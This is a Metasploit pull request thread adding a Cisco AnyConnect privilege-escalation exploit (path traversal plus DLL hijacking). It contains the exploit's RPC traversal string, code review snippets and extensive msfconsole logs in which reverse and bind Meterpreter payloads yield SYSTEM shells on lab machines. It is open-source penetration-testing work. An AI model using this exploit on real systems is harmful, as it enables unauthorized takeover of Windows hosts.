Add Cisco AnyConnect Priv Esc through Path Traversal module
rapid7/metasploit-framework pull request #13739
Opened 2020-06-19 18:29 UTC by cdelafuente-r7

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.

The attack consists in sending a specially crafted RPC request to the TCP port
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
Mobility Agent service. This service will then launch the vulnerable installer
component (`vpndownloader`), which copies itself to an arbitrary location
before being executed with system privileges. Since `vpndownloader` is also
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
at the same location `vpndownloader` will be copied to get code execution with
system privileges.

This exploit has been succesfully tested against Cisco AnyConnect Secure
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86).

## Verification

- [ ] Start `msfconsole`
- [ ] Get a session with non-administrative privileges
- [ ] `use exploit/windows/local/anyconnect_path_traversal_lpe`
- [ ] `set SESSION <SESSION>`
- [ ] `set LHOST <LHOST>`
- [ ] `set LPORT <LPORT>`
- [ ] `check`
- [ ] Verify the `check` method returns the expected AnyConnect version
- [ ] `run`
- [ ] Verify you get a new session with system privileges

2020-06-19 18:48 UTC, bcoles commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +The installer component of Cisco AnyConnect Secure Mobility Client for Windows
```
[WARNING] Docs should start with ## Vulnerable Application
```

```suggestion
## Vulnerable Application

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
```

2020-06-19 18:48 UTC, bcoles commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +
```suggestion
```

2020-06-19 18:48 UTC, bcoles commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +  **ForceExploit**
```
[WARNING] Options should use ### instead of bolds (**)
```

```suggestion
  ### ForceExploit
```

2020-06-19 18:48 UTC, bcoles commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +This exploit has been succesfully tested against Cisco AnyConnect Secure
```suggestion
This exploit has been successfully tested against Cisco AnyConnect Secure
```

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +          This exploit has been succesfully tested against Cisco AnyConnect Secure
```suggestion
          This exploit has been successfully tested against Cisco AnyConnect Secure
```

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +            [ 'CVE', '2020-3153']
Unbalanced whitespace.

```suggestion
            ['Cisco Bug ID', 'CSCvs46327'],
            ['URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
            ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
            ['CVE', '2020-3153']
```

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +            [ 'Cisco Bug ID', 'CSCvs46327' ],
I don't think `Cisco Bug ID` is a known value. Perhaps it should be ...

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    Rex::sleep(3)
I think `.` is preferred (maybe):

```suggestion
    Rex.sleep(3)
```

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    [ 'C:\\Program Files (x86)', 'C:\\Program Files' ].each do |pf_path|
Perhaps use environment variables rather than, or in addition to, hard-coded paths?

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    dbghelp_path = 'C:\\ProgramData\\Cisco\\dbghelp.dll'
Perhaps use environment variables rather than, or in addition to, hard-coded paths?

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    # vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
Perhaps use environment variables rather than, or in addition to, hard-coded paths?

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    register_file_for_cleanup("C:\\ProgramData\\Cisco\\vpndownloader.exe")
Perhaps use environment variables rather than, or in addition to, hard-coded paths?

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    cac_cmd << "\t#{@installation_path}\\nope\\nope\\nope\\nope\\../../../../vpndownloader.exe\t-\""
```suggestion
    junk = Rex::Text.rand_text_alpha(4)
    cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
```

2020-06-19 18:48 UTC, bcoles commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    end
`'vpndownloader.exe not found on the file system'` seems more like an error than a warning. Also, returning early would save some spaghetti.

```suggestion
    unless file_path
      vprint_error('vpndownloader.exe not found on the file system')
      return CheckCode::Safe
    end
    
    vprint_status("Found vpndownloader.exe path: '#{file_path}'")
    version = file_version(file_path)
    if version
      patched_version = Gem::Version.new('4.8.02042')
      @ac_version = Gem::Version.new(version.join('.'))
      if @ac_version < patched_version
        vprint_good("Cisco AnyConnect version #{@ac_version} appears to be vulnerable")
        return CheckCode::Appears
      else
        vprint_error("Cisco AnyConnect version #{@ac_version} is not vulnerable")
        return CheckCode::Safe
      end
    else
      vprint_warning('Unable to retrieve vpndownloader.exe file version')
    end
```

2020-06-22 14:08 UTC, cdelafuente-r7 commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    dbghelp_path = 'C:\\ProgramData\\Cisco\\dbghelp.dll'
Absolutely, I will update this. Thanks!

2020-06-22 14:09 UTC, cdelafuente-r7 commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +            [ 'Cisco Bug ID', 'CSCvs46327' ],
Yes, you're right, it is not handled. I will remove it.

2020-06-22 14:09 UTC, cdelafuente-r7 commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    Rex::sleep(3)
I'll change this too.

2020-06-22 14:10 UTC, cdelafuente-r7 commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    [ 'C:\\Program Files (x86)', 'C:\\Program Files' ].each do |pf_path|
Absolutely, I will update this. Thanks!

2020-06-22 14:10 UTC, cdelafuente-r7 commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    cac_cmd << "\t#{@installation_path}\\nope\\nope\\nope\\nope\\../../../../vpndownloader.exe\t-\""
Thanks!

2020-06-22 14:10 UTC, cdelafuente-r7 commented
@bcoles , thanks for your review and comments. I think I addressed all of them here: 3997dbd

2020-06-22 15:53 UTC, gwillcox-r7 commented
Looks like @bcoles's issues were addressed with the commit @cdelafuente-r7 mentioned and we would like to get this out ASAP, so going to go ahead and start testing this out. @cdelafuente-r7 will let you know if I run into any errors :)

2020-06-22 17:01 UTC, gwillcox-r7 requested changes
Overall looks fairly good but there are a few areas that I think could use with better wording and/or randomization. Also need to add support for AutoCheck. 90% all minor changes though, should hopefully not take long :)

2020-06-22 17:36 UTC, gwillcox-r7 commented
Hmm tried this on a Windows 10 v2004 machine with anyconnect-win-4.7.04056-predeploy-k9, but no luck:

```
msf5 > use multi/handler
set paymsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set RHOST 169.254.94.222
RHOST => 169.254.94.222
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     169.254.94.222   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 169.254.94.222:4444
[*] Sending stage (201283 bytes) to 169.254.94.222
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 169.254.94.222:4444) at 2020-06-22 12:32:02 -0500

meterpreter > getuid
Server username: DESKTOP-KUO5CML\test
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/anyconnect_path_traversal_lpe
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > show options

Module options (exploit/windows/local/anyconnect_path_traversal_lpe):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   INSTALL_PATH                   no        Cisco AnyConnect Secure Mobility Client installation path (where 'vpndownloader.exe' should be found). It will be automatically detected if not set.
   SESSION                        yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.129    yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 8899
LPORT => 8899
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set RHOST 169.254.94.222
RHOST => 169.254.94.222
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > show options

Module options (exploit/windows/local/anyconnect_path_traversal_lpe):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   INSTALL_PATH                   no        Cisco AnyConnect Secure Mobility Client installation path (where 'vpndownloader.exe' should be found). It will be automatically detected if not set.
   SESSION       1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     8899             yes       The listen port
   RHOST     169.254.94.222   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > exploit

[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042.
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] Started bind TCP handler against 169.254.94.222:8899
[*] Waiting 10s before cleanup...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > exploit

[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042.
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] Started bind TCP handler against 169.254.94.222:8899
[*] Waiting 10s before cleanup...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) >
```

2020-06-22 21:18 UTC, gwillcox-r7 commented
```
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > exploit

[*] Started reverse TCP handler on 169.254.115.5:8899
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042.
[*] "-ipc" argument needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] RPC Command: "CAC-nc-install        -ipc=2239       C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\nuUX\nuUX\nuUX\nuUX\../../../../vpndownloader.exe  -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded RPC command (size = 269 bytes)
[*] Shutdown the socket
[*] Waiting 10s before cleanup...
[-] Failed to delete C:\ProgramData\Cisco\vpndownloader.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > show options

Module options (exploit/windows/local/anyconnect_path_traversal_lpe):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   INSTALL_PATH                   no        Cisco AnyConnect Secure Mobility Client installation path (where 'vpndownloader.exe' should be found). It will be automatically detected if not set.
   SESSION       2                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     169.254.115.5    yes       The listen address (an interface may be specified)
   LPORT     8899             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(windows/local/anyconnect_path_traversal_lpe) >
```

Looking into this closer it seems that `C:\ProgramData\Cisco\dbghelp.dll` is created and subsequently deleted as part of cleanup, but `C:\ProgramData\Cisco\vpndownloader.exe` is not deleted due to some weird error where is says you need to be admin to delete that file. You can see the files are created in the image below:

![looks like files are downloaded correctly so at least that works (2)](https://user-images.githubusercontent.com/63261883/85335425-9b370f80-b4a2-11ea-8238-934ac8a93a91.PNG)

I also tried running the `vpndownloader.exe` client manually but have had no luck with it so far. For reference I am using an internal network connection in the above connection.

Seeing as I thought this might be a connection type issue similar to the BITS exploit issue I had in the past, where the target needed to be internet connected I tried again with an internet connected PC, but I'm also getting the same result:

```
msf5 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.30.123.229:4444
[*] Sending stage (201283 bytes) to 172.30.123.229
[*] Meterpreter session 4 opened (0.0.0.0:0 -> 172.30.123.229:4444) at 2020-06-22 16:15:22 -0500

meterpreter > background
[*] Backgrounding session 4...
'msf5 exploit(multi/handler) >use exploit/windows/local/anyconnect_path_traversal_lpe
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > show options

Module options (exploit/windows/local/anyconnect_path_traversal_lpe):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   INSTALL_PATH                   no        Cisco AnyConnect Secure Mobility Client installation path (where 'vpndownloader.exe' should be found). It will be automatically detected if not set.
   SESSION       3                yes       The session to run this module on.


Payload options (windows/x64/messagebox):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   EXITFUNC  process           yes       Exit technique (Accepted: '', seh, thread, process, none)
   ICON      NO                yes       Icon type (Accepted: NO, ERROR, INFORMATION, WARNING, QUESTION)
   TEXT      Hello, from MSF!  yes       Messagebox Text
   TITLE     MessageBox        yes       Messagebox Title


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 4
SESSION => 4
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > show options

Module options (exploit/windows/local/anyconnect_path_traversal_lpe):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   INSTALL_PATH                   no        Cisco AnyConnect Secure Mobility Client installation path (where 'vpndownloader.exe' should be found). It will be automatically detected if not set.
   SESSION       4                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     8899             yes       The listen port
   RHOST     169.254.94.222   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set RHOST 172.30.123.229
RHOST => 172.30.123.229
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > exploit

[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042.
[*] "-ipc" argument needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] RPC Command: "CAC-nc-install        -ipc=8724       C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\Phcf\Phcf\Phcf\Phcf\../../../../vpndownloader.exe  -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded RPC command (size = 269 bytes)
[*] Shutdown the socket
[*] Started bind TCP handler against 172.30.123.229:8899
[-] The connection was refused by the remote host (172.30.123.229:8899).
[*] Waiting 10s before cleanup...
[-] Failed to delete C:\ProgramData\Cisco\vpndownloader.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) >
```

2020-06-23 17:54 UTC, gwillcox-r7 commented
After further talks with @cdelafuente-r7 it looks like the issues mentioned above may have occurred due to me using a x64 Meterpreter payload. Attempting to use a x86 Meterpreter payload works fine, even on a Windows 10 x64 v2004 machine, as can be seen below:

```
msf5 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 169.254.94.222:4444
[*] Sending stage (201283 bytes) to 169.254.94.222
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 169.254.94.222:4444) at 2020-06-23 12:43:22 -0500

meterpreter > sysinfo
Computer        : DESKTOP-KUO5CML
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-KUO5CML\test
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/anyconnect_path_traversal_lpe
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > show options

Module options (exploit/windows/local/anyconnect_path_traversal_lpe):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   INSTALL_PATH                   no        Cisco AnyConnect Secure Mobility Client installation path (where 'vpndownloader.exe' should be found). It will be automatically detected if not set.
   SESSION                        yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.129    yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 169.254.115.5
LHOST => 169.254.115.5
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 8822
LPORT => 8822
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > exploit

[*] Started HTTPS reverse handler on https://169.254.115.5:8822
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042.
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] https://169.254.115.5:8822 handling request from 169.254.94.222; (UUID: oyq1kcds) Staging x86 payload (177241 bytes) ...
[*] Meterpreter session 2 opened (169.254.115.5:8822 -> 169.254.94.222:49689) at 2020-06-23 12:45:51 -0500
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-KUO5CML
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```

Also can confirm that the exploit cleans itself up as this is the view of the directory where we drop the files directly after the shell opens: 

![Successful cleanup of Cisco files](https://user-images.githubusercontent.com/63261883/85437605-7b5e2500-b550-11ea-98b5-3912fed1ca51.PNG)

Only issue I did have was that I wasn't able to migrate from a 32 bit process into a 64 bit one, but I'm not sure that issue is really related to this exploit per say?

```
meterpreter > ps

Process List
============

 PID   PPID  Name                         Arch  Session  User                          Path
 ---   ----  ----                         ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                       x64   0
....
 4396  748   SearchIndexer.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
....

meterpreter > migrate 4396
[*] Migrating from 1552 to 4396...
[-] Error running command migrate: Rex::TimeoutError Operation timed out.
meterpreter >
```

2020-06-24 17:08 UTC, cdelafuente-r7 commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    ]
So, I tried to use `AutoCheck` mixin but its behavior is not exactly what I am looking for. The `check` method needs to be executed to populate the `@installation_path` and `@ac_version` instance variable. These are used by the `exploit` method. So, If I disable `AutoCheck` (`set AutoCheck false`), this will skip the `check method` and the exploit will fail due to an empty `@installation_path`.
With `ForceExploit`, the `check` will be always executed, whatever the option is set to. If `ForceExploit` is set to `true`, it will continue the execution with the instance variable set (hopefully).

Maybe we can update the mixin to add another option similar to `ForceExploit` and only fail if it is set to `false`.

2020-06-24 20:00 UTC, cdelafuente-r7 commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +to create/overwrite files in arbitrary locations with system level privileges.
Sure, I'll change this. Thanks!

2020-06-24 20:00 UTC, cdelafuente-r7 commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +The attack consists in sending a specially crafted RPC request to the TCP port
Thanks for catching this!

2020-06-24 20:02 UTC, cdelafuente-r7 commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +  1. Install the application
This is fare. I added a full *Install the Application* section to the documentation.

2020-06-24 20:03 UTC, cdelafuente-r7 commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +  Set this to `true` to override the `check` result during exploitation.
Please, see my comment about AutoCheck below.

2020-06-24 21:04 UTC, cdelafuente-r7 commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +  [*] "-ipc" argument needed
I usually prefer running the exploit with verbose enabled, especially for verification steps. I think it is useful for the operator since he can make sure every step is identical to what I've done.

2020-06-24 21:15 UTC, cdelafuente-r7 commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
Sure! Thanks!

2020-06-24 21:23 UTC, cdelafuente-r7 commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +    junk = Rex::Text.rand_text_alpha(4)
As we discussed offline, I will use alphanumeric but keep the small size to avoid possible issues with path length in this IPC message.

2020-06-24 21:24 UTC, cdelafuente-r7 commented on modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
> +      cac_cmd << "\t-ipc=#{rand_text_numeric(4)}"
The `-ipc` flag is supposed to be the port number, so only numeric and max 5 numbers.

2020-06-24 21:39 UTC, cdelafuente-r7 commented
@gwillcox-r7, thanks for your testing and great feedback. I've just pushed a new commit with the requested changes. I also added some logic to make sure the selected payload is a x86 payload.

2020-06-24 21:56 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
> +  [*] "-ipc" argument needed
Fair, this isn't major and I realized you set the VERBOSE flag later on, so should be all good :)

2020-06-24 22:05 UTC, gwillcox-r7 commented
Cool thanks for the changes, reviewing now :)

2020-06-24 22:41 UTC, gwillcox-r7 commented
Hurray, looks like the payload option issue from before was fixed successfully:

```
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > exploit

[*] Started reverse TCP handler on 169.254.115.5:6688
[-] Exploit aborted due to failure: none: Payload architecture is not compatible with this module. Please, select an x86 payload
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) >
```

2020-06-24 22:43 UTC, gwillcox-r7 commented
Final test and this looks good. Going to land this now. Here are the results from the test:

```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set RHOST 169.254.94.222
RHOST => 169.254.94.222
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     169.254.94.222   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 169.254.94.222:4444
[*] Sending stage (201283 bytes) to 169.254.94.222
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 169.254.94.222:4444) at 2020-06-24 17:39:18 -0500

meterpreter > getuid
Server username: DESKTOP-KUO5CML\test
meterpreter > sysinfo
Computer        : DESKTOP-KUO5CML
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/anyconnect_path_traversal_lpe
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > show options

Module options (exploit/windows/local/anyconnect_path_traversal_lpe):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   INSTALL_PATH                   no        Cisco AnyConnect Secure Mobility Client installation path (where 'vpndownloader.exe' should be found). It will be automatically detected if not set.
   SESSION                        yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86/x64 with x86 payload


msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 169.254.
set LHOST 169.254.115.5    set LHOST 169.254.68.24    set LHOST 169.254.90.12
set LHOST 169.254.232.110  set LHOST 169.254.73.111
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 169.254.115.5
LHOST => 169.254.115.5
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 6688
LPORT => 6688
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > exploit

[*] Started reverse TCP handler on 169.254.115.5:6688
[-] Exploit aborted due to failure: none: Payload architecture is not compatible with this module. Please, select an x86 payload
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > exploit

[*] Started reverse TCP handler on 169.254.115.5:6688
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042.
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] Sending stage (176195 bytes) to 169.254.94.222
[*] Meterpreter session 2 opened (169.254.115.5:6688 -> 169.254.94.222:60877) at 2020-06-24 17:42:34 -0500
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > sysinfo
Computer        : DESKTOP-KUO5CML
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
